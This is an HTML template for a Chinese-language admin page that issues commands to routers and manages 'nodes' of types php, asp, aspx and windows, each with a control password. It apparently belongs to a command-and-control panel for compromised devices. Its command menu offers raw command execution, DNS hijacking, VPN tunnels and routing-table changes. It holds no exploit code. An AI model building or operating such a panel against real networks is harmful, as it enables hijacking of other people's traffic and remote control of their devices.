{%  extends 'base.html' %}
{% block reference %}
	<link href="/static/css/bootstrap.css" media="all" rel="stylesheet">
	<script src="/static/js/bootstrap.min.js"></script>
	<script src="/static/js/index.js"></script>
	<script src="/static/js/jquery.min.js"></script>
{% endblock %}

{% block content %}
	<div class="" style="margin:30px 20px 20px 25px">

	<div style="text-align:center; padding-left:92px; background:none repeat scroll 0% 0% #C9F0DD;height:60px">
		<h4 style="text-align:center; padding:20px 0 0 30px;">管理员控制页面</h4>
	</div>
	<div class="row clearfix" style="margin:20px 0 20px 0px">
		<div class="col-md-2 column" style="background:rgba(198, 190, 204, 1)">
					<div class="sidebar-tab"><a href="/route/index">反馈者管理</a></div>
					<div class="sidebar-tab"><a href="/route/router">路由器管理</a></div>
          <div class="sidebar-tab"><a href="/route/routerconnect">路由连接信息</a></div>
					<div class="sidebar-tab-active"><a href="/route/order">命令控制</a></div>
		</div>
		<div class="col-md-10 column">
			<div style="margin-left:85%">
				{% if username %}
						欢迎, <b> {{username}} </b>
						 (<a href="/route/logout">登出</a>)
				{% else %}
						<a href = "/route/login"> 登录 </a>
				{% endif %}
			</div>
		<h3>命令列表({{orderCnt}})</h3>
			<table style="border-width:0px;border-collapse:collapse;width:100%">
				<tr style="background-color:#E0E0E0;height:40px;border-width:0px">
					<td style="width:7%;border-width:0px;font-weight:bold;text-align:center">标号</td>
					<td style="width:18%; border-width:0px;font-weight:bold;text-align:center">类型</td>
					<td style="width:20%; border-width:0px;font-weight:bold;text-align:center">参数 </td>
					<td style="width:15%; border-width:0px;font-weight:bold;text-align:center">状态</td>
					<td style="width:25%;border-width:0px;font-weight:bold;text-align:center"> 结果 </td>
					<td style="width:15%;border-width:0px;font-weight:bold;text-align:center">创建时间</td>
				</tr>
			</table>

			<table id = "dnsContent" style="border-width:0px;border-collapse:collapse;width:100%;table-layout:fixed;word-wrap:break-word;word-break:break-all;">
				{% for order in orders %}
				<tr class="{% cycle row1,row2 %}" style="">
				<td style="width:7%;border-width:0px;text-align:center">{{order.id}}</td>
				<td style="width:18%;border-width:0px;text-align:centerborder-width:0px;text-align:centerborder-width:0px;text-align:center">{{order.type}}</td>
				<td style="width:20%;border-width:0px;text-align:centerborder-width:0px;text-align:center">{{order.params}}</td>
				<td style="width:15%;border-width:0px;text-align:center">{% if order.is_get == 0 %} 未获取 {% elif order.is_ret == 0 %} 未返回  {% else %} 已返回 {% endif %}</td>
				<td  data-toggle="modal"
				   data-target="#myModal3" style="width:25%;border-width:0px;text-align:center"><a onclick="getAns('{{order.ret_ans}}')">{{order.ret_ans|truncatechars:30}}</a></td>
				<td style="width:15%;border-width:0px;text-align:center">
					{{ order.date}}
				{% endfor %}
			</table>

			<div style="margin:20px 0 0 20px">
				<!-- 按钮触发模态框 -->
				<button class="btn btn-primary btn-sm" data-toggle="modal"
				   data-target="#myModal2">
				      发送命令
				</button>
			</div>

			<div class="modal fade" id="myModal1" tabindex="-1" role="dialog"
			  aria-labelledby="myModalLabel" aria-hidden="true" style="margin:30px 0 0 24%; width:60%">
			   <div class="modal-dialog">
			      <div class="modal-content">
			         <div class="modal-header">
			            <button type="button" class="close"
			               data-dismiss="modal" aria-hidden="true">
			                  &times;
			            </button>
			            <h4 class="modal-title" id="myModalLabel">
			               添加新节点
			            </h4>
			         </div>

			         <form action="/control/addnode/" method='POST'>
			         <div class="modal-body">
			         	<div style="margin: 10px 0 0 0">
			         		节点名称 :  <input style="margin-left:10px" type='text' name='nodename' id='nodename'>
			         	</div>

			         	 <div style="margin: 20px 0 0 0">
			         	 	节点描述： <input style="margin-left:5px" type='text' name='nodedescription' id='nodedescription'>
			         	 </div>

			         	 <div style="margin: 20px 0 0 0">
			         		节点 url:  <input style="margin-left:22px" type='text' name='nodeurl' id='nodeurl'>
			         	</div>
			         	 <div style="margin: 20px 0 0 0">
			         		节点 ip:  <input style="margin-left:27px" type='text' name='nodeip' id='nodeip'>
			         	</div>
			         	 <div style="margin: 20px 0 0 0">
			         		节点 port:  <input style="margin-left:14px" type='text' name='nodeport' id='nodeport'>
			         	</div>

			         	<div style="margin: 20px 0 0 0">
			         		节点类型 : <select  style="margin-left:12px;width:160px" name='nodetype' id='nodetype'>
			         		<option selected='selected' value='windows'>windows</option>
			         		<option value='php'>php</option>
			         		<option value='asp'>asp</option>
			         		<option value='aspx'>aspx</option>
			         		<option value='replay'>replay</option>
			         		</select>
			         	</div>

			         	<div style="margin: 20px 0 0 0">
			         		控制密码 :  <input style="margin-left:12px" type='password' name='pwd' id='pwd'>
			         	</div>
			         	<div style="margin: 20px 0 0 0">
			         		重复密码 :  <input style="margin-left:12px" type='password' name='pwdagain' id='pwdagain'>
			         	</div>

			        	 </div>


			         <div class="modal-footer">
			            <button type="button" class="btn btn-default"
			               data-dismiss="modal">取消
			            </button>
			            <button type="submit" class="btn btn-primary">
			          	    确定添加
			            </button>
			         </div>
			       </form>

			      </div>
			</div>
			</div>

				<div class="modal fade" id="myModal2" tabindex="-1" role="dialog"
			  aria-labelledby="myModalLabel" aria-hidden="true" style="margin:30px 0 0 24%; width:60%">
			   <div class="modal-dialog">
			      <div class="modal-content">
			         <div class="modal-header">
			            <button type="button" class="close"
			               data-dismiss="modal" aria-hidden="true">
			                  &times;
			            </button>
			            <h4 class="modal-title" id="myModalLabel">
			               发送命令
			            </h4>
			         </div>

			         <form action="/route/addorders/" method='POST'>
			         <div class="modal-body">
			         	<input style="display:none;" id="reserveData" name="routerIds">
			         	<div style="margin: 20px 0 0 0">
			         		命令类型 :
			         		<select  style="margin-left:22px;width:180px" name='ordertype' id='ordertype' onchange="showParamsBox()">
				         		<option selected='selected' value='GET_CLIENTS_INFO'> 获得路由下属的客户端信息 </option>
								<option value='GET_LINK_STATUS'> 获得路由器所有的链接信息 </option>
				         		<option value='GET_INTERFACES_INFO'>获得路由器接口信息</option>
				         		<option value='RAW_COMMAND'>执行原始命令</option>
				         		<option value='GET_ROUTE_STATUS'>获得路由器的路由表信息</option>
								<option value='START_DNS_HIJACK'>开启dns劫持</option>
								<option value='GET_DNS_STATUS'>验证dns劫持状态</option>
								<option value='STOP_DNS_HIJACK'>停止dns劫持</option>
								<option value='START_VPN'>开启vpn隧道</option>
				         		<option value='STOP_VPN'>关闭vpn隧道</option>
				         		<option value='GET_VPN_STATUS'>获得vpn状态</option>
								<option value='ADD_ROUTE'>添加路由表</option>
								<option value='DEL_ROUTE'>删除路由表</option>
			         		</select>
			         	</div>

			         	 <div style="margin: 20px 0 0 0" id='params'>
	
			         	 </div>
			        </div>

			         <div class="modal-footer">
			            <button type="button" class="btn btn-default"
			               data-dismiss="modal">取消
			            </button>
			            <button type="submit" class="btn btn-primary" onclick="addData()">
			          	    确定添加
			            </button>
			         </div>
			       </form>

			      </div>
				</div>
			</div>


			<div class="modal fade" id="myModal3" tabindex="-1" role="dialog"
				  aria-labelledby="myModalLabel" aria-hidden="true" style="margin:77px 0 0 13%; width:80%">
				   <div class="modal-dialog">
				      <div class="modal-content">

				         <div class="modal-header">
				            <button type="button" class="close"
				               data-dismiss="modal" aria-hidden="true">
				                  &times;
				            </button>
				            <h4 class="modal-title" id="myModalLabel">
				             	命令结果详情
				            </h4>
				         </div>

				         <div class="modal-body">
						   	<div id = 'orderAns' style='margin-left:20px'>
						   	</div>
				         </div>

				        <div class="modal-footer">
					            <button type="button" class="btn btn-default"
					               data-dismiss="modal">收起
					            </button>
				       </div>

				      </div>
				</div>
			</div>
		</div>
	</div>
</div>
{% endblock %}s
